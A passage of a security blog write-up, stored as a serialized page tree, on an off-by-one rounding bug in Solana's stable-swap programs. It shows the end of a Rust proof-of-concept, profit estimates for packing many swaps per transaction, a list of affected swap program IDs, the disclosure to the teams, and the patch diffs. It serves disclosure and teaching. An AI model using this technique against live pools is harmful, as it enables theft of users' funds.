2\n",{"type":26,"tag":137,"props":6246,"children":6248},{"class":5559,"line":6247},16,[6249,6254,6258,6263],{"type":26,"tag":137,"props":6250,"children":6251},{"style":5601},[6252],{"type":32,"value":6253},"    )",{"type":26,"tag":137,"props":6255,"children":6256},{"style":5590},[6257],{"type":32,"value":470},{"type":26,"tag":137,"props":6259,"children":6260},{"style":5682},[6261],{"type":32,"value":6262},"unwrap",{"type":26,"tag":137,"props":6264,"children":6265},{"style":5601},[6266],{"type":32,"value":6267},"();\n",{"type":26,"tag":137,"props":6269,"children":6271},{"class":5559,"line":6270},17,[6272],{"type":26,"tag":137,"props":6273,"children":6274},{"emptyLinePlaceholder":18},[6275],{"type":32,"value":6276},"\n",{"type":26,"tag":137,"props":6278,"children":6280},{"class":5559,"line":6279},18,[6281],{"type":26,"tag":137,"props":6282,"children":6283},{"style":5564},[6284],{"type":32,"value":6285},"    // nonce\n",{"type":26,"tag":137,"props":6287,"children":6289},{"class":5559,"line":6288},19,[6290,6295,6299,6304,6308,6313,6317,6321,6326,6331,6335,6339,6343,6348],{"type":26,"tag":137,"props":6291,"children":6292},{"style":5584},[6293],{"type":32,"value":6294},"    swap_instruction",{"type":26,"tag":137,"props":6296,"children":6297},{"style":5590},[6298],{"type":32,"value":470},{"type":26,"tag":137,"props":6300,"children":6301},{"style":5601},[6302],{"type":32,"value":6303},"data",{"type":26,"tag":137,"props":6305,"children":6306},{"style":5590},[6307],{"type":32,"value":470},{"type":26,"tag":137,"props":6309,"children":6310},{"style":5682},[6311],{"type":32,"value":6312},"append",{"type":26,"tag":137,"props":6314,"children":6315},{"style":5601},[6316],{"type":32,"value":165},{"type":26,"tag":137,"props":6318,"children":6319},{"style":5590},[6320],{"type":32,"value":5694},{"type":26,"tag":137,"props":6322,"children":6323},{"style":5573},[6324],{"type":32,"value":6325},"mut",{"type":26,"tag":137,"props":6327,"children":6328},{"style":5682},[6329],{"type":32,"value":6330}," vec!",{"type":26,"tag":137,"props":6332,"children":6333},{"style":5601},[6334],{"type":32,"value":3016},{"type":26,"tag":137,"props":6336,"children":6337},{"style":5584},[6338],{"type":32,"value":506},{"type":26,"tag":137,"props":6340,"children":6341},{"style":5601},[6342],{"type":32,"value":1108},{"type":26,"tag":137,"props":6344,"children":6345},{"style":5584},[6346],{"type":32,"value":6347},"extranonce",{"type":26,"tag":137,"props":6349,"children":6350},{"style":5601},[6351],{"type":32,"value":6352},"]);\n",{"type":26,"tag":137,"props":6354,"children":6356},{"class":5559,"line":6355},20,[6357],{"type":26,"tag":137,"props":6358,"children":6359},{"emptyLinePlaceholder":18},[6360],{"type":32,"value":6276},{"type":26,"tag":137,"props":6362,"children":6364},{"class":5559,"line":6363},21,[6365,6369,6373,6378,6382,6386],{"type":26,"tag":137,"props":6366,"children":6367},{"style":5573},[6368],{"type":32,"value":5576},{"type":26,"tag":137,"props":6370,"children":6371},{"style":5573},[6372],{"type":32,"value":5581},{"type":26,"tag":137,"props":6374,"children":6375},{"style":5584},[6376],{"type":32,"value":6377}," instructions",{"type":26,"tag":137,"props":6379,"children":6380},{"style":5590},[6381],{"type":32,"value":5593},{"type":26,"tag":137,"props":6383,"children":6384},{"style":5682},[6385],{"type":32,"value":6330},{"type":26,"tag":137,"props":6387,"children":6388},{"style":5601},[6389],{"type":32,"value":6390},"[];\n",{"type":26,"tag":137,"props":6392,"children":6394},{"class":5559,"line":6393},22,[6395],{"type":26,"tag":137,"props":6396,"children":6397},{"emptyLinePlaceholder":18},[6398],{"type":32,"value":6276},{"type":26,"tag":137,"props":6400,"children":6402},{"class":5559,"line":6401},23,[6403,6408,6412,6417,6421,6426],{"type":26,"tag":137,"props":6404,"children":6405},{"style":5584},[6406],{"type":32,"value":6407},"    instructions",{"type":26,"tag":137,"props":6409,"children":6410},{"style":5590},[6411],{"type":32,"value":470},{"type":26,"tag":137,"props":6413,"children":6414},{"style":5682},[6415],{"type":32,"value":6416},"push",{"type":26,"tag":137,"props":6418,"children":6419},{"style":5601},[6420],{"type":32,"value":165},{"type":26,"tag":137,"props":6422,"children":6423},{"style":5584},[6424],{"type":32,"value":6425},"swap_instruction",{"type":26,"tag":137,"props":6427,"children":6428},{"style":5601},[6429],{"type":32,"value":6430},");\n",{"type":26,"tag":137,"props":6432,"children":6434},{"class":5559,"line":6433},24,[6435],{"type":26,"tag":137,"props":6436,"children":6437},{"emptyLinePlaceholder":18},[6438],{"type":32,"value":6276},{"type":26,"tag":137,"props":6440,"children":6442},{"class":5559,"line":6441},25,[6443,6448,6452,6457,6461,6465,6470,6474,6478,6483,6487,6491,6495],{"type":26,"tag":137,"props":6444,"children":6445},{"style":5584},[6446],{"type":32,"value":6447},"    env",{"type":26,"tag":137,"props":6449,"children":6450},{"style":5590},[6451],{"type":32,"value":470},{"type":26,"tag":137,"props":6453,"children":6454},{"style":5682},[6455],{"type":32,"value":6456},"execute_as_transaction",{"type":26,"tag":137,"props":6458,"children":6459},{"style":5601},[6460],{"type":32,"value":165},{"type":26,"tag":137,"props":6462,"children":6463},{"style":5590},[6464],{"type":32,"value":5694},{"type":26,"tag":137,"props":6466,"children":6467},{"style":5584},[6468],{"type":32,"value":6469},"instructions",{"type":26,"tag":137,"props":6471,"children":6472},{"style":5601},[6473],{"type":32,"value":1108},{"type":26,"tag":137,"props":6475,"children":6476},{"style":5590},[6477],{"type":32,"value":5694},{"type":26,"tag":137,"props":6479,"children":6480},{"style":5682},[6481],{"type":32,"value":6482},"vec!",{"type":26,"tag":137,"props":6484,"children":6485},{"style":5601},[6486],{"type":32,"value":3016},{"type":26,"tag":137,"props":6488,"children":6489},{"style":5590},[6490],{"type":32,"value":5694},{"type":26,"tag":137,"props":6492,"children":6493},{"style":5584},[6494],{"type":32,"value":6127},{"type":26,"tag":137,"props":6496,"children":6497},{"style":5601},[6498],{"type":32,"value":6352},{"type":26,"tag":137,"props":6500,"children":6502},{"class":5559,"line":6501},26,[6503],{"type":26,"tag":137,"props":6504,"children":6505},{"style":5601},[6506],{"type":32,"value":6507},"}\n",{"type":26,"tag":35,"props":6509,"children":6510},{},[6511],{"type":32,"value":6512},"It works!",{"type":26,"tag":5503,"props":6514,"children":6515},{},[6516],{"type":26,"tag":35,"props":6517,"children":6518},{},[6519],{"type":32,"value":6520},"holy shit\nyea, this is big",{"type":26,"tag":35,"props":6522,"children":6523},{},[6524],{"type":26,"tag":2210,"props":6525,"children":6527},{"alt":7,"src":6526},"/posts/spl-swap/poc.png",[],{"type":26,"tag":92,"props":6529,"children":6531},{"id":6530},"exploitability",[6532],{"type":32,"value":6533},"Exploitability",{"type":26,"tag":35,"props":6535,"children":6536},{},[6537],{"type":32,"value":6538},"Off-by-one bugs are much easier to exploit on Solana compared to other chains, enabled by the relatively low fees on Solana.",{"type":26,"tag":35,"props":6540,"children":6541},{},[6542],{"type":32,"value":6543},"A single swap on Ethereum can cost dozens of dollars, but on Solana packing hundreds of swap instructions into a single transaction costs the same flat rate of 5000 lamports (at least prior to the 1.9 per transaction size compute limit update).",{"type":26,"tag":35,"props":6545,"children":6546},{},[6547],{"type":32,"value":6548},"This transaction cost discrepancy can trip up developers who transitioned from Ethereum to Solana. For example, the developers who wrote tests for the Solana Program Library implementation of stable swap assumed the impact of an off by one error would be negligible.",{"type":26,"tag":35,"props":6550,"children":6551},{},[6552],{"type":26,"tag":2210,"props":6553,"children":6555},{"alt":7,"src":6554},"/posts/spl-swap/pr.png",[],{"type":26,"tag":35,"props":6557,"children":6558},{},[6559,6561,6566],{"type":32,"value":6560},"As we mentioned previously, due to the rounding error, each swap allowed an attacker to steal a single token. It's important to keep in mind that this represents a single token ",{"type":26,"tag":762,"props":6562,"children":6563},{},[6564],{"type":32,"value":6565},"per instruction",{"type":32,"value":6567},". Transactions on Solana can also contain multiple instructions.",{"type":26,"tag":35,"props":6569,"children":6570},{},[6571],{"type":32,"value":6572},"With an onchain program, we are able to fit over 50 swap instructions per transaction. Each transaction can be run around 3 times before exceeding the per-instruction compute limit cap. Thus, we can pack around 150 invocations per transaction.",{"type":26,"tag":35,"props":6574,"children":6575},{},[6576,6578,6583],{"type":32,"value":6577},"Some quick napkin math confirms that this ",{"type":26,"tag":762,"props":6579,"children":6580},{},[6581],{"type":32,"value":6582},"is",{"type":32,"value":6584}," indeed profitable. At a price of $41440 per Bitcoin, we are able to steal around 6 cents per transaction.",{"type":26,"tag":35,"props":6586,"children":6587},{},[6588],{"type":26,"tag":130,"props":6589,"children":6591},{"className":6590},[133,134],[6592],{"type":26,"tag":137,"props":6593,"children":6595},{"className":6594},[140],[6596],{"type":26,"tag":137,"props":6597,"children":6599},{"className":6598,"ariaHidden":146},[145],[6600,6688,6740,6778],{"type":26,"tag":137,"props":6601,"children":6603},{"className":6602},[151],[6604,6608,6613,6664,6674,6678,6684],{"type":26,"tag":137,"props":6605,"children":6607},{"className":6606,"style":252},[156],[],{"type":26,"tag":137,"props":6609,"children":6611},{"className":6610},[169],[6612],{"type":32,"value":878},{"type":26,"tag":137,"props":6614,"children":6616},{"className":6615},[169],[6617,6622],{"type":26,"tag":137,"props":6618,"children":6620},{"className":6619},[169],[6621],{"type":32,"value":1817},{"type":26,"tag":137,"props":6623,"children":6625},{"className":6624},[236],[6626],{"type":26,"tag":137,"props":6627,"children":6629},{"className":6628},[241],[6630],{"type":26,"tag":137,"props":6631,"children":6633},{"className":6632},[246],[6634],{"type":26,"tag":137,"props":6635,"children":6637},{"className":6636,"style":252},[251],[6638],{"type":26,"tag":137,"props":6639,"children":6640},{"style":256},[6641,6645],{"type":26,"tag":137,"props":6642,"children":6644},{"className":6643,"style":262},[261],[],{"type":26,"tag":137,"props":6646,"children":6648},{"className":6647},[267,268,269,270],[6649],{"type":26,"tag":137,"props":6650,"children":6652},{"className":6651},[169,270],[6653,6658],{"type":26,"tag":137,"props":6654,"children":6656},{"className":6655},[169,270],[6657],{"type":32,"value":1935},{"type":26,"tag":137,"props":6659,"children":6661},{"className":6660},[169,270],[6662],{"type":32,"value":6663},"8",{"type":26,"tag":137,"props":6665,"children":6667},{"className":6666},[169,32],[6668],{"type":26,"tag":137,"props":6669,"children":6671},{"className":6670},[169],[6672],{"type":32,"value":6673}," BTC",{"type":26,"tag":137,"props":6675,"children":6677},{"className":6676,"style":348},[184],[],{"type":26,"tag":137,"props":6679,"children":6681},{"className":6680},[353],[6682],{"type":32,"value":6683},"∗",{"type":26,"tag":137,"props":6685,"children":6687},{"className":6686,"style":348},[184],[],{"type":26,"tag":137,"props":6689,"children":6691},{"className":6690},[151],[6692,6696,6702,6707,6711,6717,6727,6731,6736],{"type":26,"tag":137,"props":6693,"children":6695},{"className":6694,"style":157},[156],[],{"type":26,"tag":137,"props":6697,"children":6699},{"className":6698},[169],[6700],{"type":32,"value":6701},"$41",{"type":26,"tag":137,"props":6703,"children":6705},{"className":6704},[177],[6706],{"type":32,"value":180},{"type":26,"tag":137,"props":6708,"children":6710},{"className":6709,"style":185},[184],[],{"type":26,"tag":137,"props":6712,"children":6714},{"className":6713},[169],[6715],{"type":32,"value":6716},"400/",{"type":26,"tag":137,"props":6718,"children":6720},{"className":6719},[169,32],[6721],{"type":26,"tag":137,"props":6722,"children":6724},{"className":6723},[169],[6725],{"type":32,"value":6726},"BTC",{"type":26,"tag":137,"props":6728,"children":6730},{"className":6729,"style":348},[184],[],{"type":26,"tag":137,"props":6732,"children":6734},{"className":6733},[353],[6735],{"type":32,"value":6683},{"type":26,"tag":137,"props":6737,"children":6739},{"className":6738,"style":348},[184],[],{"type":26,"tag":137,"props":6741,"children":6743},{"className":6742},[151],[6744,6749,6755,6765,6769,6774],{"type":26,"tag":137,"props":6745,"children":6748},{"className":6746,"style":6747},[156],"height:0.8389em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":6750,"children":6752},{"className":6751},[169],[6753],{"type":32,"value":6754},"150",{"type":26,"tag":137,"props":6756,"children":6758},{"className":6757},[169,32],[6759],{"type":26,"tag":137,"props":6760,"children":6762},{"className":6761},[169],[6763],{"type":32,"value":6764}," swaps",{"type":26,"tag":137,"props":6766,"children":6768},{"className":6767,"style":281},[184],[],{"type":26,"tag":137,"props":6770,"children":6772},{"className":6771},[286],[6773],{"type":32,"value":289},{"type":26,"tag":137,"props":6775,"children":6777},{"className":6776,"style":281},[184],[],{"type":26,"tag":137,"props":6779,"children":6781},{"className":6780},[151],[6782,6787],{"type":26,"tag":137,"props":6783,"children":6786},{"className":6784,"style":6785},[156],"height:0.8056em;vertical-align:-0.0556em;",[],{"type":26,"tag":137,"props":6788,"children":6790},{"className":6789},[169],[6791],{"type":32,"value":6792},"$0.0621",{"type":26,"tag":35,"props":6794,"children":6795},{},[6796],{"type":32,"value":6797},"At 200 transactions per second, we can extract just over a million dollars per day.",{"type":26,"tag":35,"props":6799,"children":6800},{},[6801],{"type":32,"value":6802},"We're well on our way to becoming a millionaire!",{"type":26,"tag":92,"props":6804,"children":6806},{"id":6805},"patch",[6807],{"type":32,"value":6808},"Patch",{"type":26,"tag":35,"props":6810,"children":6811},{},[6812],{"type":32,"value":6813},"Now that we had a proof-of-concept going, it was time to contact the relevant teams.",{"type":26,"tag":35,"props":6815,"children":6816},{},[6817],{"type":32,"value":6818},"By grepping through Solana logs for the swap instruction log, we were able to identify many potential spl-token-swap forks.",{"type":26,"tag":5512,"props":6820,"children":6824},{"code":6821,"language":6822,"meta":7,"className":6823,"style":7},"solana logs -um | grep 'Instruction: Swap' -B1\n","bash","language-bash shiki shiki-themes slack-dark",[6825],{"type":26,"tag":130,"props":6826,"children":6827},{"__ignoreMap":7},[6828],{"type":26,"tag":137,"props":6829,"children":6830},{"class":5559,"line":5560},[6831,6835,6841,6846,6851,6856,6861],{"type":26,"tag":137,"props":6832,"children":6833},{"style":5682},[6834],{"type":32,"value":5450},{"type":26,"tag":137,"props":6836,"children":6838},{"style":6837},"--shiki-default:#CE9178",[6839],{"type":32,"value":6840}," logs",{"type":26,"tag":137,"props":6842,"children":6843},{"style":6837},[6844],{"type":32,"value":6845}," -um",{"type":26,"tag":137,"props":6847,"children":6848},{"style":5590},[6849],{"type":32,"value":6850}," |",{"type":26,"tag":137,"props":6852,"children":6853},{"style":5682},[6854],{"type":32,"value":6855}," grep",{"type":26,"tag":137,"props":6857,"children":6858},{"style":6837},[6859],{"type":32,"value":6860}," 'Instruction: Swap'",{"type":26,"tag":137,"props":6862,"children":6863},{"style":6837},[6864],{"type":32,"value":6865}," -B1\n",{"type":26,"tag":35,"props":6867,"children":6868},{},[6869],{"type":32,"value":6870},"With some Google dorking, we were able to identify many of these programs.",{"type":26,"tag":5512,"props":6872,"children":6874},{"code":6873},"1SoLTvbiicqXZ3MJmnTL2WYXKLYpuxwHpa4yYrVQaMZ  - \"1 SOL\"\n9W959DqEETiGZocYWCQPaJ6sBmUzgfxXfqGeTEdp3aQP - Orca Swap Program v2\nSCHAtsf8mbjyjiv4LkhLKutTf6JnZAbdJKFkXQNMFHZ  - \"Sencha Swap\"\nSSwapUtytfBdBn1b9NUGG6foMVPtcWgpRU32HToDUZr  - \"Saros Swap\"\nSSwpkEEcbUqx4vtoEByFjSkhKdCT862DNVb52nZg1UZ  - Saber Stable Swap Program\nSSwpMgqNDsyV7mAgN9ady4bDVu5ySjmmXejXvy2vLt1  - Step Finance Swap Program\nSwaPpA9LAaLfeLi3a68M4DjnLqgtticKg6CnyNwgAC8  - Swap Program\n",[6875],{"type":26,"tag":130,"props":6876,"children":6877},{"__ignoreMap":7},[6878],{"type":32,"value":6873},{"type":26,"tag":35,"props":6880,"children":6881},{},[6882],{"type":32,"value":6883},"Now it was time to contact these teams.",{"type":26,"tag":35,"props":6885,"children":6886},{},[6887],{"type":32,"value":6888},"Of these protocols, Saber was the only one which had BTC stable swaps, which would make exploitation immediately profitable. Luckily, they were also the most responsive, triaging and patching the vulnerability in just over one day.",{"type":26,"tag":35,"props":6890,"children":6891},{},[6892],{"type":32,"value":6893},"After some discussion, they decided to port a patch from Curve.fi, subtracting one from the output amount.",{"type":26,"tag":5512,"props":6895,"children":6897},{"code":6896,"language":5551,"meta":7,"className":5552,"style":7},"-        let dy = swap_destination_amount.checked_sub(y)?;\n+        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n+        let dy = swap_destination_amount.checked_sub(y)?.checked_sub(1)?;\n",[6898],{"type":26,"tag":130,"props":6899,"children":6900},{"__ignoreMap":7},[6901,6955,6967],{"type":26,"tag":137,"props":6902,"children":6903},{"class":5559,"line":5560},[6904,6909,6913,6918,6922,6927,6931,6935,6939,6943,6947,6951],{"type":26,"tag":137,"props":6905,"children":6906},{"style":5590},[6907],{"type":32,"value":6908},"-",{"type":26,"tag":137,"props":6910,"children":6911},{"style":5573},[6912],{"type":32,"value":5648},{"type":26,"tag":137,"props":6914,"children":6915},{"style":5584},[6916],{"type":32,"value":6917}," dy",{"type":26,"tag":137,"props":6919,"children":6920},{"style":5590},[6921],{"type":32,"value":5593},{"type":26,"tag":137,"props":6923,"children":6924},{"style":5584},[6925],{"type":32,"value":6926}," swap_destination_amount",{"type":26,"tag":137,"props":6928,"children":6929},{"style":5590},[6930],{"type":32,"value":470},{"type":26,"tag":137,"props":6932,"children":6933},{"style":5682},[6934],{"type":32,"value":5818},{"type":26,"tag":137,"props":6936,"children":6937},{"style":5601},[6938],{"type":32,"value":165},{"type":26,"tag":137,"props":6940,"children":6941},{"style":5584},[6942],{"type":32,"value":193},{"type":26,"tag":137,"props":6944,"children":6945},{"style":5601},[6946],{"type":32,"value":200},{"type":26,"tag":137,"props":6948,"children":6949},{"style":5590},[6950],{"type":32,"value":5737},{"type":26,"tag":137,"props":6952,"children":6953},{"style":5601},[6954],{"type":32,"value":5604},{"type":26,"tag":137,"props":6956,"children":6957},{"class":5559,"line":5412},[6958,6962],{"type":26,"tag":137,"props":6959,"children":6960},{"style":5590},[6961],{"type":32,"value":356},{"type":26,"tag":137,"props":6963,"children":6964},{"style":5564},[6965],{"type":32,"value":6966},"        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n",{"type":26,"tag":137,"props":6968,"children":6969},{"class":5559,"line":5417},[6970,6974,6978,6982,6986,6990,6994,6998,7002,7006,7010,7014,7018,7022,7026,7030,7034],{"type":26,"tag":137,"props":6971,"children":6972},{"style":5590},[6973],{"type":32,"value":356},{"type":26,"tag":137,"props":6975,"children":6976},{"style":5573},[6977],{"type":32,"value":5648},{"type":26,"tag":137,"props":6979,"children":6980},{"style":5584},[6981],{"type":32,"value":6917},{"type":26,"tag":137,"props":6983,"children":6984},{"style":5590},[6985],{"type":32,"value":5593},{"type":26,"tag":137,"props":6987,"children":6988},{"style":5584},[6989],{"type":32,"value":6926},{"type":26,"tag":137,"props":6991,"children":6992},{"style":5590},[6993],{"type":32,"value":470},{"type":26,"tag":137,"props":6995,"children":6996},{"style":5682},[6997],{"type":32,"value":5818},{"type":26,"tag":137,"props":6999,"children":7000},{"style":5601},[7001],{"type":32,"value":165},{"type":26,"tag":137,"props":7003,"children":7004},{"style":5584},[7005],{"type":32,"value":193},{"type":26,"tag":137,"props":7007,"children":7008},{"style":5601},[7009],{"type":32,"value":200},{"type":26,"tag":137,"props":7011,"children":7012},{"style":5590},[7013],{"type":32,"value":5715},{"type":26,"tag":137,"props":7015,"children":7016},{"style":5682},[7017],{"type":32,"value":5818},{"type":26,"tag":137,"props":7019,"children":7020},{"style":5601},[7021],{"type":32,"value":165},{"type":26,"tag":137,"props":7023,"children":7024},{"style":5626},[7025],{"type":32,"value":878},{"type":26,"tag":137,"props":7027,"children":7028},{"style":5601},[7029],{"type":32,"value":200},{"type":26,"tag":137,"props":7031,"children":7032},{"style":5590},[7033],{"type":32,"value":5737},{"type":26,"tag":137,"props":7035,"children":7036},{"style":5601},[7037],{"type":32,"value":5604},{"type":26,"tag":35,"props":7039,"children":7040},{},[7041,7043,7050],{"type":32,"value":7042},"For reference, here is the ",{"type":26,"tag":41,"props":7044,"children":7047},{"href":7045,"rel":7046},"https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466",[45],[7048],{"type":32,"value":7049},"Curve.fi implementation",{"type":32,"value":470},{"type":26,"tag":5512,"props":7052,"children":7056},{"code":7053,"language":7054,"meta":7,"className":7055,"style":7},"    dy: uint256 = xp[j] - y - 1  # -1 just in case there were some rounding errors\n    dy_fee: uint256 = dy * self.fee / FEE_DENOMINATOR\n","solidity","language-solidity shiki shiki-themes slack-dark",[7057],{"type":26,"tag":130,"props":7058,"children":7059},{"__ignoreMap":7},[7060,7123],{"type":26,"tag":137,"props":7061,"children":7062},{"class":5559,"line":5560},[7063,7068,7073,7078,7082,7087,7091,7096,7100,7105,7110,7114,7118],{"type":26,"tag":137,"props":7064,"children":7065},{"style":5601},[7066],{"type":32,"value":7067},"    dy",{"type":26,"tag":137,"props":7069,"children":7070},{"style":5590},[7071],{"type":32,"value":7072},":",{"type":26,"tag":137,"props":7074,"children":7075},{"style":6009},[7076],{"type":32,"value":7077}," uint256",{"type":26,"tag":137,"props":7079,"children":7080},{"style":5590},[7081],{"type":32,"value":5593},{"type":26,"tag":137,"props":7083,"children":7084},{"style":5601},[7085],{"type":32,"value":7086}," xp[j] ",{"type":26,"tag":137,"props":7088,"children":7089},{"style":5590},[7090],{"type":32,"value":6908},{"type":26,"tag":137,"props":7092,"children":7093},{"style":5601},[7094],{"type":32,"value":7095}," y ",{"type":26,"tag":137,"props":7097,"children":7098},{"style":5590},[7099],{"type":32,"value":6908},{"type":26,"tag":137,"props":7101,"children":7102},{"style":5626},[7103],{"type":32,"value":7104}," 1",{"type":26,"tag":137,"props":7106,"children":7107},{"style":5601},[7108],{"type":32,"value":7109},"  # ",{"type":26,"tag":137,"props":7111,"children":7112},{"style":5590},[7113],{"type":32,"value":6908},{"type":26,"tag":137,"props":7115,"children":7116},{"style":5626},[7117],{"type":32,"value":878},{"type":26,"tag":137,"props":7119,"children":7120},{"style":5601},[7121],{"type":32,"value":7122}," just in case there were some rounding errors\n",{"type":26,"tag":137,"props":7124,"children":7125},{"class":5559,"line":5412},[7126,7131,7135,7139,7143,7148,7153,7158,7163],{"type":26,"tag":137,"props":7127,"children":7128},{"style":5601},[7129],{"type":32,"value":7130},"    dy_fee",{"type":26,"tag":137,"props":7132,"children":7133},{"style":5590},[7134],{"type":32,"value":7072},{"type":26,"tag":137,"props":7136,"children":7137},{"style":6009},[7138],{"type":32,"value":7077},{"type":26,"tag":137,"props":7140,"children":7141},{"style":5590},[7142],{"type":32,"value":5593},{"type":26,"tag":137,"props":7144,"children":7145},{"style":5601},[7146],{"type":32,"value":7147}," dy ",{"type":26,"tag":137,"props":7149,"children":7150},{"style":5590},[7151],{"type":32,"value":7152},"*",{"type":26,"tag":137,"props":7154,"children":7155},{"style":5601},[7156],{"type":32,"value":7157}," self.fee ",{"type":26,"tag":137,"props":7159,"children":7160},{"style":5590},[7161],{"type":32,"value":7162},"/",{"type":26,"tag":137,"props":7164,"children":7165},{"style":5601},[7166],{"type":32,"value":7167}," FEE_DENOMINATOR\n",{"type":26,"tag":35,"props":7169,"children":7170},{},[7171,7173,7180],{"type":32,"value":7172},"We originally thought this was an additional patch that didn't get ported over to Solana. However, it turns out this code was actually included in the ",{"type":26,"tag":41,"props":7174,"children":7177},{"href":7175,"rel":7176},"https://github.com/curvefi/curve-contract/commit/0fd801df7488d89f0e2fc81e760942d7858b01d6",[45],[7178],{"type":32,"value":7179},"original commit",{"type":32,"value":7181},", not as an additional security patch.",{"type":26,"tag":5512,"props":7183,"children":7185},{"code":7184},"commit 0fd801df7488d89f0e2fc81e760942d7858b01d6\nAuthor: Ben Hauser \u003Cben@hauser.id>\nDate:   Mon Aug 31 02:35:30 2020 +0300\n\n    feat: add base pool without lending\n",[7186],{"type":26,"tag":130,"props":7187,"children":7188},{"__ignoreMap":7},[7189],{"type":32,"value":7184},{"type":26,"tag":35,"props":7191,"children":7192},{},[7193,7195,7202],{"type":32,"value":7194},"The commit adding stable swaps to SPL was ",{"type":26,"tag":41,"props":7196,"children":7199},{"href":7197,"rel":7198},"https://github.com/solana-labs/solana-program-library/commit/d62ddd2b94d5d2daaa97460b165d288610a87623",[45],[7200],{"type":32,"value":7201},"made a few months later",{"type":32,"value":7203},", meaning there was some disconnect when porting the code. Either the rounding was thought to be unnecesary, or it was simply forgotten.",{"type":26,"tag":5512,"props":7205,"children":7207},{"code":7206},"commit d62ddd2b94d5d2daaa97460b165d288610a87623\nAuthor: Yuriy Savchenko \u003Cyuriy.savchenko@gmail.com>\nDate:   Tue Nov 17 15:13:18 2020 +0200\n\n    Added stable curve invariant to the token swap smart contract (#838)\n\n    * Added stable curve invariant to the token swap smart contract\n\n    * Fixed formatting\n\n    * Added missing stable curve constraints\n\n    * Symbol renames to make math clearer\n\n    * Small refactoring according to PR comments, fixes for JS tests\n",[7208],{"type":26,"tag":130,"props":7209,"children":7210},{"__ignoreMap":7},[7211],{"type":32,"value":7206},{"type":26,"tag":35,"props":7213,"children":7214},{},[7215,7217,7224],{"type":32,"value":7216},"After contacting some other swap projects which were unaffected, we decided to notify the Solana team in order to get a patch upstreamed to ",{"type":26,"tag":41,"props":7218,"children":7221},{"href":7219,"rel":7220},"https://github.com/solana-labs/solana-program-library",[45],[7222],{"type":32,"value":7223},"the Solana Program Library",{"type":32,"value":470},{"type":26,"tag":35,"props":7226,"children":7227},{},[7228],{"type":32,"value":7229},"While few projects deploy the swap program from the Solana Program Library, the SPL program is meant as a reference implementation, and many exchanges fork their own code off of it.",{"type":26,"tag":35,"props":7231,"children":7232},{},[7233,7240],{"type":26,"tag":41,"props":7234,"children":7237},{"href":7235,"rel":7236},"https://github.com/joncinque",[45],[7238],{"type":32,"value":7239},"@joncinque",{"type":32,"value":7241}," helped triage this patch. We also asked him for his thoughts on a more complete solution.",{"type":26,"tag":5503,"props":7243,"children":7244},{},[7245],{"type":26,"tag":35,"props":7246,"children":7247},{},[7248],{"type":32,"value":7249},"Honestly, the idea of just subtracting 1 from the output will cover almost all situations correctly, so it's a good quick solution. I'll take a look to see if we can solve this for all situations through a correct application of checked_ceil_div, as with the constant product curve.",{"type":26,"tag":35,"props":7251,"children":7252},{},[7253,7255,7262,7264,7270],{"type":32,"value":7254},"After some thought, he helped ",{"type":26,"tag":41,"props":7256,"children":7259},{"href":7257,"rel":7258},"https://github.com/solana-labs/solana-program-library/pull/2942",[45],[7260],{"type":32,"value":7261},"introduce a PR",{"type":32,"value":7263}," which ceilings the computation in ",{"type":26,"tag":130,"props":7265,"children":7267},{"className":7266},[],[7268],{"type":32,"value":7269},"compute_new_destination_amount",{"type":32,"value":7271}," to correctly round within the stable curve math library.",{"type":26,"tag":5512,"props":7273,"children":7275},{"code":7274,"language":5551,"meta":7,"className":5552,"style":7},"     // Solve for y by approximating: y**2 + b*y = c\n     let mut y_prev: U256;\n     let mut y = d_val;\n     for _ in 0..ITERATIONS {\n-        y_prev = y;\n-        y = (checked_u8_power(&y, 2)?.checked_add(c)?)\n-            .checked_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n-        if y == y_prev {\n+        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n+            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n+        if y_new == y {\n             break;\n+        } else {\n+            y = y_new;\n         }\n",[7276],{"type":26,"tag":130,"props":7277,"children":7278},{"__ignoreMap":7},[7279,7287,7317,7344,7372,7396,7472,7576,7603,7698,7801,7828,7840,7859,7882],{"type":26,"tag":137,"props":7280,"children":7281},{"class":5559,"line":5560},[7282],{"type":26,"tag":137,"props":7283,"children":7284},{"style":5564},[7285],{"type":32,"value":7286},"     // Solve for y by approximating: y**2 + b*y = c\n",{"type":26,"tag":137,"props":7288,"children":7289},{"class":5559,"line":5412},[7290,7295,7299,7304,7308,7313],{"type":26,"tag":137,"props":7291,"children":7292},{"style":5573},[7293],{"type":32,"value":7294},"     let",{"type":26,"tag":137,"props":7296,"children":7297},{"style":5573},[7298],{"type":32,"value":5581},{"type":26,"tag":137,"props":7300,"children":7301},{"style":5584},[7302],{"type":32,"value":7303}," y_prev",{"type":26,"tag":137,"props":7305,"children":7306},{"style":5590},[7307],{"type":32,"value":7072},{"type":26,"tag":137,"props":7309,"children":7310},{"style":6009},[7311],{"type":32,"value":7312}," U256",{"type":26,"tag":137,"props":7314,"children":7315},{"style":5601},[7316],{"type":32,"value":5604},{"type":26,"tag":137,"props":7318,"children":7319},{"class":5559,"line":5417},[7320,7324,7328,7332,7336,7340],{"type":26,"tag":137,"props":7321,"children":7322},{"style":5573},[7323],{"type":32,"value":7294},{"type":26,"tag":137,"props":7325,"children":7326},{"style":5573},[7327],{"type":32,"value":5581},{"type":26,"tag":137,"props":7329,"children":7330},{"style":5584},[7331],{"type":32,"value":5587},{"type":26,"tag":137,"props":7333,"children":7334},{"style":5590},[7335],{"type":32,"value":5593},{"type":26,"tag":137,"props":7337,"children":7338},{"style":5584},[7339],{"type":32,"value":5598},{"type":26,"tag":137,"props":7341,"children":7342},{"style":5601},[7343],{"type":32,"value":5604},{"type":26,"tag":137,"props":7345,"children":7346},{"class":5559,"line":5642},[7347,7352,7356,7360,7364,7368],{"type":26,"tag":137,"props":7348,"children":7349},{"style":5610},[7350],{"type":32,"value":7351},"     